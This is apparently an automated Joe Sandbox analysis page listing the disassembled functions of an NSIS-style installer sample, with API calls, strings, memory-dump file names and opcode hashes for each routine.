                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                      • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                      • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                      • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                      • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                      Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                      • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                      • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                      • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                      • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                      • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                      • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                      • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                      Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004279E0,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                      • String ID: F$A
                                                                                                                                                                                                                                                                                      • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                      • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                      • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                      Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                      • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                      • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                      • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                      Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004279E0,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,004279E0,759223A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                      • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                      • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                      • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                      • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                      Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                                                                                                                      • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                      • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                      • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                      • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                      Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                      • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                      Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                      • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                      Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
